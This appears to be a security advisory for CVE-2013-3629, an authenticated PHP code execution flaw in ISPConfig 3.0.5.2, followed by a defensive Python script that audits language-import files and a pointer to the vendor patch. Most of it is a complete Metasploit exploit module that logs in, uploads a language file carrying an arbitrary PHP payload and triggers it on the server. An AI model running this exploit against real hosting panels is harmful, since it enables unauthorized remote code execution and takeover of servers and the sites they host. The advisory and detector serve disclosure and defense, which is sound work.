ISPConfig '/content.php' Arbitrary PHP Code Execution Vulnerability
Source: Brandon Perry  Published: 2013-02-15 16:30:00
ISPConfig is an open-source, BSD-licensed Linux hosting control panel used to manage Apache, BIND, FTP and databases; it supports many Linux distributions.
When the /content.php script in ISPConfig 3.0.5.2 parses language files, an arbitrary PHP code execution vulnerability is triggered: an existing language file on the system can be overwritten, and arbitrary PHP code is then executed in the context of the web server.
BUGTRAQ-ID: 63455
CVE-ID: CVE-2013-3629
Affected systems:
ISPConfig ISPConfig 3.0.5.2
Test method:
Warning: the following program (method) may be offensive in nature and is provided solely for security research and teaching. Users act at their own risk!

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ISPConfig Authenticated Arbitrary PHP Code Execution',
      'Description'    => %q{
        ISPConfig allows an authenticated administrator to export language settings into a PHP script
        which is intended to be reuploaded later to restore language settings. This feature
        can be abused to run arbitrary PHP code remotely on the ISPConfig server.
        This module was tested against version 3.0.5.2.
      },
      'Author'         =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-3629'],
          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'BadChars' => "&\n=+%",
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 30 2013'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base ISPConfig directory path", '/']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
        OptString.new('LANGUAGE', [ true, "The language to use to trigger the payload", 'es'])
      ], self.class)
  end

  def check
  end

  def lng
    datastore['LANGUAGE']
  end

  def exploit
    # Fetch the login page to obtain a session cookie.
    init = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, '/index.php')
    })

    if !init or init.code != 200
      fail_with("Error getting initial page.")
    end

    sess = init.get_cookies

    post = {
      'username' => datastore["USERNAME"],
      'passwort' => datastore["PASSWORD"],
      's_mod'    => 'login',
      's_pg'     => 'index'
    }

    print_status("Authenticating as user: " << datastore["USERNAME"])

    login = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, '/content.php'),
      'vars_post' => post,
      'cookie'    => sess
    })

    if !login or login.code != 200
      fail_with("Error authenticating.")
    end

    sess = login.get_cookies

    # Build a language-import file whose 'global' section carries the payload.
    fname = rand_text_alphanumeric(rand(10)+6) + '.lng'

    php = "---|ISPConfig Language File|3.0.5.2|#{lng}\n"
    php << "--|global|#{lng}|#{lng}.lng\n"
    php << "<?php \n"
    php << payload.encoded
    php << "?>\n"
    php << "--|mail|#{lng}|#{lng}.lng\n"
    php << "<?php"
    php << "?>"

    data = Rex::MIME::Message.new
    data.add_part(php, 'application/x-php', nil, "form-data; name=\"file\"; filename=\"#{fname}\"")
    data.add_part('1', nil, nil, 'form-data; name="overwrite"')
    data.add_part('1', nil, nil, 'form-data; name="ignore_version"')
    data.add_part('', nil, nil, 'form-data; name="id"')

    data_post = data.to_s

    print_status("Sending payload")

    send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, '/admin/language_import.php'),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data_post,
      'cookie' => sess
    })

    post = {
      'lng_select' => 'es'
    }

    print_status("Triggering payload...")

    # Loading the language makes ISPConfig include the overwritten .lng file.
    send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, '/admin/language_complete.php'),
      'vars_post' => post,
      'cookie'    => sess
    })
  end
end
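As an added defensive check, not part of the original advisory or the Metasploit module: a Python audit of an ISPConfig language-import file in the format the module builds (the `---|ISPConfig Language File|...` header and `--|module|lang|file` section markers), flagging every section line that is not a plain `$wb['key'] = 'value';` translation assignment. The two sample blobs are constructed, and the `phpinfo();` line is a harmless stand-in for injected code.

```python
import re
# Header and section markers of the ISPConfig language-import format.
HEADER = re.compile(r"^---\|ISPConfig Language File\|[^|]+\|[^|]+$")
SECTION = re.compile(r"^--\|([^|]+)\|([^|]+)\|([^|]+)$")
# A legitimate .lng file consists only of PHP tags, blank lines, comments and
# $wb['key'] = 'value'; assignments; any other statement is suspicious.
ALLOWED_LINE = re.compile(
    r"""^\s*(?:<\?php\s*\?>|<\?php|\?>|//.*|#.*|"""
    r"""\$wb\[\s*(['"])[^'"]*\1\s*\]\s*=\s*(['"]).*\2\s*;)?\s*$"""
)
def audit_language_import(blob):
    """Return (module, target_file, line_no, line) for every line inside a
    language section that is not a plain translation assignment."""
    lines = blob.splitlines()
    if not lines or not HEADER.match(lines[0]):
        raise ValueError("not an ISPConfig language-import file")
    findings = []
    module = target = None
    for line_no, line in enumerate(lines[1:], start=2):
        m = SECTION.match(line)
        if m:
            module, target = m.group(1), m.group(3)
            continue
        if module is None and not line.strip():
            continue  # blank line before the first section is harmless
        if module is None or not ALLOWED_LINE.match(line):
            findings.append((module or "<no section>", target or "<none>", line_no, line))
    return findings
# Constructed sample: a legitimate Spanish 'global' section.
BENIGN_IMPORT = """---|ISPConfig Language File|3.0.5.2|es
--|global|es|es.lng
<?php
$wb['conf_format_dateshort'] = 'd/m/Y';
$wb['error_301'] = 'Módulo no permitido para el usuario actual.';
?>
"""
# Constructed sample shaped like the module's upload; phpinfo() is a harmless
# stand-in for the injected code.
TAMPERED_IMPORT = """---|ISPConfig Language File|3.0.5.2|es
--|global|es|es.lng
<?php
phpinfo();
?>
--|mail|es|es.lng
<?php?>"""
if __name__ == "__main__":
    for finding in audit_language_import(TAMPERED_IMPORT):
        print("suspicious line in %s/%s at line %d: %s" % finding)
```

The same check can be run over the files under lib/lang and interface/web/*/lib/lang on an existing installation to spot a language file that was already overwritten.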
Solution:
Vendor patch:
ISPConfig
---------
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's homepage:
http://www.ispconfig.org/page/home.html
References:
http://osvdb.org/show/osvdb/99146